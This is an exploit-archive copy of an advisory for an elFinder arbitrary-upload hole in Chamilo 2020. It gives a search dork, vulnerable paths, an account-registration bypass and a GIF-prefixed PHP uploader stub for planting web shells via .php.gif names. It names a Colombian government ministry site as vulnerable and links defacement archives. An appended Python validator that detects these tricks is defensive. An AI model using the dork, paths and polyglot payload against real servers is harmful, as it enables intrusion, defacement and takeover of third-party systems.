Chamilo © 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability

CVE | Category | Price | Severity
N/A | CWE-434 | N/A | High

Author | Risk | Exploitation Type | Date
N/A | High/Exploitable | Remote | 2020-05-27
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050204

Below is a copy:

Chamilo 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
####################################################################

# Exploit Title : Chamilo  2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27 May 2020
# Vendor Homepage : campus.chamilo.org
# Software Version : 1 and 1.x.x etc...
# Software Download Link : chamilo.org/en/download/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Powered by Chamilo  2020 site:com
# Vulnerability Type : 
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 Permissions, Privileges, and Access Controls
CAPEC-650 [ Upload a Web Shell to a Web Server ]
CAPEC-17 [ Using Malicious Files ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
mirror-h.org/search/hacker/94/
mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
aljyyosh.org/hacker.php?id=Cyberizm.Org
aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities

####################################################################

# Impact :
***********
This Software is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible.

CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
*********************************************************
The software allows the attacker to upload or transfer files of dangerous types that 
can be automatically processed within the product's environment.

CWE-264 Permissions, Privileges, and Access Controls
****************************************************
Weaknesses in this category are related to the management of 
permissions, privileges, and other security features that are used 
to perform access control.

CAPEC-650 [ Upload a Web Shell to a Web Server ]
*********************************************************
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in
such a way that it can be executed remotely. This shell can have various capabilities, thereby acting 
as a "gateway" to the underlying web server. The shell might execute at the higher permission level 
of the web server, providing the ability to execute malicious code at elevated levels.

CAPEC-17 [ Using Malicious Files ]
*******************************
An attack of this type exploits a system's configuration that allows an attacker to either directly 
access an executable file, for example through shell access, or, in a possible worst case, allows 
an attacker to upload a file and then execute it. Web servers, FTP servers, and message-oriented
middleware systems which have many integration points are particularly vulnerable, because 
both the programmers and the administrators must be in sync regarding the interfaces 
and the correct privileges for each interface.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

Important Note :  Ministry of Commerce Industry and Tourism Colombia [ mincit.gov.co ] is vulnerable. 

If it says to you :

Unable to connect to backend. 
Invalid backend configuration.
Readable volumes not available.

Then register yourself with an Admin or Author account.

/main/auth/inscription.php

Then you can use File Upload and Shell the sites with .php.gif or php.pjpg

Use your Brain :)

Vulnerability ScreenShot Proof  => 

https://www.upload.ee/image/11775401/mincitgovcoexploitelfinder27520.png

https://www.upload.ee/image/11775402/elfinderexploit27052020.png

Upload your shell in gif format and then rename the format 

# If the rename function is disabled, add this  GIF89;aGIF89;aGIF89;a   before <?PHP
# Example

GIF89;aGIF89;aGIF89;a<html>
 <head>
  <title>PHP Test</title>
  <form action="" method="post" enctype="multipart/form-data">
  <input type="file" name="fileToUpload" id="fileToUpload">
  <input type="submit" value="upload file" name="submit">
  </form>
 </head>
 <body>
 <?php echo '<p>FILE UPLOAD</p><br>';
 $tgt_dir = "uploads/";
 $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
 echo "<br>TARGET FILE= ".$tgt_file;
 //$filename = $_FILES['fileToUpload']['name'];
 echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
 if(isset($_POST['submit']))
 {
 if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
    { echo "<br>file exists, try with another name"; }
 else   {
         echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $tgt_file))
        { echo "<br>File UPLOADED:- ".$tgt_file; }

          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
    }
 }
?>
 </body>
</html>

Directory File Path :
**********************
/app/upload/users/[ID-NUMBER]/[YOUR-NUMBER-ID]/my_files/[YOURFILENAME].html

[PATH]/my_files/[YOURFILENAME].html
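
# Added example (not part of the original advisory, and not Chamilo or elFinder code) :
A server-side upload check covering the two tricks described above: a PHP extension hidden inside the name (.php.gif, .php.pjpg) and a GIF-like prefix placed before <?PHP. The function name, extension list, marker list and sample inputs are assumptions made for illustration.

```python
import re

# Assumed policy values (not from the original page); tune per deployment.
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}
SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
MARKERS = re.compile(rb"<\?php|<\?=|<script|<html|<form", re.IGNORECASE)


def check_upload(filename, data):
    """Return a list of finding codes; an empty list means the upload passes."""
    findings = []
    exts = filename.lower().split(".")[1:]  # every suffix, not only the last
    # Apache mod_mime can act on any extension in a name, so "x.php.gif" is risky.
    if any(e in PHP_EXTS for e in exts):
        findings.append("exec-ext")
    final = exts[-1] if exts else ""
    if final not in SIGNATURES:
        findings.append("ext-not-allowed")
    elif not data.startswith(SIGNATURES[final]):
        # Exact signature match: the page's "GIF89;a" prefix is not a GIF header.
        findings.append("bad-signature")
    # A correct signature proves nothing about the rest of the file.
    if MARKERS.search(data):
        findings.append("embedded-code")
    return findings


# Constructed sample inputs (harmless payloads).
VALID_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POLYGLOT = b"GIF89;aGIF89;aGIF89;a<html><?php echo 'test'; ?></html>"

if __name__ == "__main__":
    for name, blob in [("photo.gif", VALID_GIF), ("avatar.php.gif", POLYGLOT),
                       ("avatar.php.pjpg", POLYGLOT), ("notes.html", POLYGLOT)]:
        print(name, check_upload(name, blob) or "accepted")
```

Content scanning can miss payloads, so the upload directory should also be served with script execution disabled and accepted images re-encoded before storage.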

####################################################################

# Example Vulnerable Sites :
************************

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################
